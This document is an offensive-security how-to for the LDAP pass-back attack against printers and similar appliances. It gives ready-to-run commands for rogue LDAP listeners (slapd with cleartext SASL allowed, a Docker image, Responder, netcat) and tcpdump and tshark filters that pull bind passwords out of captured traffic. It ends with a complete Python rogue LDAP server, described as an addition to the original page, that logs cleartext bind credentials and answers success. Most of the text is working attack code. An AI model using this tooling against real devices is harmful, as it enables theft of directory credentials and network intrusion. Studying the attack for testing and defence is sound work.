LDAP Pass-back Attack
A pass-back attack abuses a device that stores LDAP credentials, typically a multifunction printer or another appliance with an LDAP address-book or authentication integration. If you can change the LDAP server address the device uses and make it connect (for example with a "test connection" button), the device binds to your host and sends the stored account name and password in its bind request. With a simple bind those arrive in cleartext, so they can be read straight off the wire.
Requirements

Access to a host that can connect to the LDAP server (e.g., a printer).
The ability to change the LDAP server address on the target and trigger an LDAP connection from it (e.g., through the printer's web interface, often a "test connection" button).
The ability to run a malicious LDAP server that accepts weak (cleartext) authentication, or at least records the bind attempt (e.g., using nc, Docker, or Responder).
Setting Up a Rogue LDAP Server
1. Real LDAP Server
Install and configure the LDAP server. The reconfigure step is interactive; it asks for a DNS domain name, an organisation name and an admin password, and any values will do, since the server only has to accept binds:
sudo apt-get update && sudo apt-get -y install slapd ldap-utils
sudo systemctl enable slapd
sudo dpkg-reconfigure -p low slapd
Allow cleartext SASL binds. minssf=0 drops the minimum security strength factor to zero, so a bind with no encryption layer is accepted; noanonymous and passcred make the server insist that the client actually passes credentials, which is the point of the exercise:
Create a file olcSaslSecProps.ldif with the following content:
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
Apply the configuration and restart the service:
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif
sudo service slapd restart
Verify the advertised SASL mechanisms; after the change, the cleartext mechanisms PLAIN and LOGIN should be listed (if they are missing, install the libsasl2-modules package and restart slapd):
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
2. Docker Setup
Use a pre-built Docker image for the rogue LDAP server:
git clone https://github.com/pedrojosenavasperez/ldap-passback-docker.git
cd ldap-passback-docker/
docker buildx build -t ldap-passback .
docker run --rm -ti -p 389:389 ldap-passback
3. Responder
Responder includes an LDAP listener that accepts cleartext binds, prints the captured username and password to the console and writes them under its logs directory. Start it on the interface the target can reach:
sudo responder -I <interface>
4. Netcat
Set up a listener on port 389 using Netcat (a privileged port, so run it as root). Netcat does not speak LDAP: it only accepts the TCP connection and prints whatever the client sends. That is enough because a simple bind carries the DN and password as plain octet strings in the client's very first message, so they are readable in the dump. The client gets no reply and will time out, so you get one attempt per trigger:
sudo nc -lvp 389
Gathering Credentials
You can use network analysis tools to extract credentials sent to the rogue LDAP server. This works with any of the listeners above, since a simple bind carries the DN and password in cleartext; capturing needs root or capture privileges.
Using tcpdump: capture raw LDAP traffic on port 389 (-X prints each packet's payload in hex and ASCII, so the DN and password show up inside the bindRequest):
sudo tcpdump -SX -i <interface> tcp port 389
Using tshark: filter for simple-bind requests and print only the DN and password (ldap.protocolOp == 0 selects bindRequest, ldap.name is the bind DN and ldap.simple is the cleartext password field):
sudo tshark -i any -f "port 389" -Y "ldap.protocolOp == 0 && ldap.simple" \
-e ldap.name -e ldap.simple -Tjson 2> /dev/null
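The captures above work only because an LDAPv3 simple bind sends the DN and password as plain BER octet strings. As an added example (not code from the original page or from any of the tools it lists), the following Python listener does what the Netcat listener cannot: it speaks just enough LDAP to accept the device's bind, print the DN and password, and answer success, so the device treats its test as passed instead of timing out and retrying. It is self-contained; the DN cn=admin,dc=example,dc=com and the password Passw0rd! in the embedded sample message are made up, and the file name rogue_ldap.py in the usage comment is an assumption.

```python
import socket
import sys
from typing import Optional, Tuple

# BER tags used by LDAP bind messages (RFC 4511, ITU-T X.690)
TAG_SEQUENCE, TAG_INTEGER, TAG_OCTET_STRING, TAG_ENUMERATED = 0x30, 0x02, 0x04, 0x0A
TAG_BIND_REQUEST = 0x60   # [APPLICATION 0], constructed
TAG_BIND_RESPONSE = 0x61  # [APPLICATION 1], constructed
TAG_SIMPLE_AUTH = 0x80    # [0] simple: the cleartext password as a primitive OCTET STRING

def ber_length(n: int) -> bytes:
    """BER length: short form below 128, long form (0x80 | byte count, then big-endian bytes) otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body

def ber_int(n: int) -> bytes:
    """Minimal two's-complement encoding for INTEGER / ENUMERATED values."""
    return n.to_bytes(max(1, (n.bit_length() + 8) // 8), "big", signed=True)

def ber_tlv(tag: int, payload: bytes) -> bytes:
    return bytes([tag]) + ber_length(len(payload)) + payload

def read_tlv(buf: bytes, pos: int) -> Tuple[int, bytes, int]:
    """Return (tag, value, next_pos) for the TLV at buf[pos]; reject indefinite or oversized lengths."""
    if len(buf) < pos + 2:
        raise ValueError("truncated BER header")
    tag, first, pos = buf[pos], buf[pos + 1], pos + 2
    if first < 0x80:
        length = first
    else:
        nbytes = first & 0x7F
        if nbytes == 0 or nbytes > 4:
            raise ValueError("unsupported BER length encoding")
        length = int.from_bytes(buf[pos:pos + nbytes], "big")
        pos += nbytes
    value = buf[pos:pos + length]
    if len(value) != length:
        raise ValueError("truncated BER value")
    return tag, value, pos + length

def parse_simple_bind(msg: bytes) -> Optional[dict]:
    """Parse LDAPMessage { messageID, bindRequest { version, name, simple password } }.
    Returns None for other operations or SASL binds (no cleartext password to harvest)."""
    tag, body, _ = read_tlv(msg, 0)
    if tag != TAG_SEQUENCE:
        raise ValueError("LDAPMessage must be a SEQUENCE")
    tag, msgid, pos = read_tlv(body, 0)
    if tag != TAG_INTEGER:
        raise ValueError("missing messageID")
    tag, op, _ = read_tlv(body, pos)
    if tag != TAG_BIND_REQUEST:
        return None
    vtag, version, pos = read_tlv(op, 0)
    ntag, name, pos = read_tlv(op, pos)
    atag, cred, _ = read_tlv(op, pos)
    if vtag != TAG_INTEGER or ntag != TAG_OCTET_STRING:
        raise ValueError("malformed BindRequest")
    if atag != TAG_SIMPLE_AUTH:
        return None
    return {"message_id": int.from_bytes(msgid, "big", signed=True),
            "version": int.from_bytes(version, "big", signed=True),
            "name": name.decode("utf-8", "replace"),
            "password": cred.decode("utf-8", "replace")}

def build_bind_response(message_id: int, result_code: int = 0) -> bytes:
    """bindResponse { resultCode, matchedDN "", diagnosticMessage "" }; resultCode 0 = success."""
    result = ber_tlv(TAG_ENUMERATED, ber_int(result_code)) + ber_tlv(TAG_OCTET_STRING, b"") * 2
    return ber_tlv(TAG_SEQUENCE, ber_tlv(TAG_INTEGER, ber_int(message_id)) + ber_tlv(TAG_BIND_RESPONSE, result))

def build_simple_bind_request(message_id: int, name: str, password: str) -> bytes:
    """What an LDAPv3 client sends for a simple bind; used here only to build the sample below."""
    op = ber_tlv(TAG_INTEGER, ber_int(3)) + ber_tlv(TAG_OCTET_STRING, name.encode()) + ber_tlv(TAG_SIMPLE_AUTH, password.encode())
    return ber_tlv(TAG_SEQUENCE, ber_tlv(TAG_INTEGER, ber_int(message_id)) + ber_tlv(TAG_BIND_REQUEST, op))

# Constructed sample (DN and password are made up): the first message a printer holding
# these LDAP credentials sends once its LDAP server address points at the attacker.
SAMPLE_BIND_REQUEST = build_simple_bind_request(1, "cn=admin,dc=example,dc=com", "Passw0rd!")

def serve(host: str = "0.0.0.0", port: int = 389) -> None:
    """Accept clients one at a time, log any simple bind, and answer success."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as srv:
        srv.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        srv.bind((host, port))
        srv.listen(5)
        print(f"[*] rogue LDAP listening on {host}:{port}", file=sys.stderr)
        while True:
            conn, peer = srv.accept()
            with conn:
                data = conn.recv(65535)
                try:
                    bind = parse_simple_bind(data) if data else None
                except ValueError as exc:
                    print(f"[-] {peer[0]}: malformed message: {exc}", file=sys.stderr)
                    continue
                if bind is None:
                    print(f"[-] {peer[0]}: first message is not a simple bind", file=sys.stderr)
                    continue
                print(f"[+] {peer[0]} bound as {bind['name']!r} with password {bind['password']!r}")
                conn.sendall(build_bind_response(bind["message_id"]))

if __name__ == "__main__":  # e.g. sudo python3 rogue_ldap.py 389 (assumed file name)
    serve(port=int(sys.argv[1]) if len(sys.argv) > 1 else 389)
```

Run it as root (port 389 is privileged), then trigger the test connection on the device. A SASL bind is deliberately reported as "not a simple bind" rather than answered: a device configured for a SASL mechanism or Kerberos does not hand over a cleartext password in the bind, so the script makes that failure mode visible instead of silently logging garbage.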